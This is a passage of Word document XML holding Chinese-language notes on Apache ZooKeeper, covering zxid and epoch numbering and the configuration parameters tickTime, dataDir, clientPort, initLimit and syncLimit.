      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>表示成一个数字，也可以表示成一对整形数（</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>epoch, count)</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Epoch</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>数字表示</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leadership</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的改变。</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>每次一个新的</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>上台执政，它将有自己的</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>epoch</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00127D53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>数字</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。我们使用一个简单的算法来分配一个唯一的</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>给一个</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>proposal</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Leader</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>简单地增加</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>来为每一个</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>proposal</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>获得一个唯一的</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Leadership</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>激活将确保只有一个</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>使用一个给定的</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Epoch, </w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>所以我们的这个简单算法能够保证了每一个提案将有一个唯一的</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="0037224F" w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00AA09A6" w:rsidRDefault="00CB437C" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRDefault="00DA54D7" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId293" w:history="1">
        <w:r w:rsidR="00015F1E" w:rsidRPr="00552645">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://cailin.iteye.com/blog/2014486/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00015F1E" w:rsidRDefault="00015F1E" w:rsidP="00015F1E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F70F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D6295">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36AB2" w:rsidRPr="004441D6" w:rsidRDefault="00C36AB2" w:rsidP="00C36AB2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tickTime</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zookeeper </w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>服务器之间或客户端与服务器之间心跳的时间间隔。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36AB2" w:rsidRPr="004441D6" w:rsidRDefault="00C36AB2" w:rsidP="00C36AB2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dataDir</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zookeeper </w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>保存数据的目录，默认情况下，</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zookeeper </w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>将写数据的日志文件也保存在这个目录里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36AB2" w:rsidRPr="004441D6" w:rsidRDefault="00C36AB2" w:rsidP="00C36AB2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clientPort</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Zookeeper </w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>服务器监听端口，用来接受客户端的访问请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6295" w:rsidRPr="004441D6" w:rsidRDefault="007541C0" w:rsidP="007541C0">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>initLimit</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>初始通信时限</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集群中的</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(F)</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(L)</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>之间</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA20CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>初始连接时</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>能容忍的最多心跳数（</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tickTime</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的数量）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003621FF" w:rsidRPr="004441D6" w:rsidRDefault="003621FF" w:rsidP="007541C0">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>syncLimit</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>同步通信时限</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集群中的</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
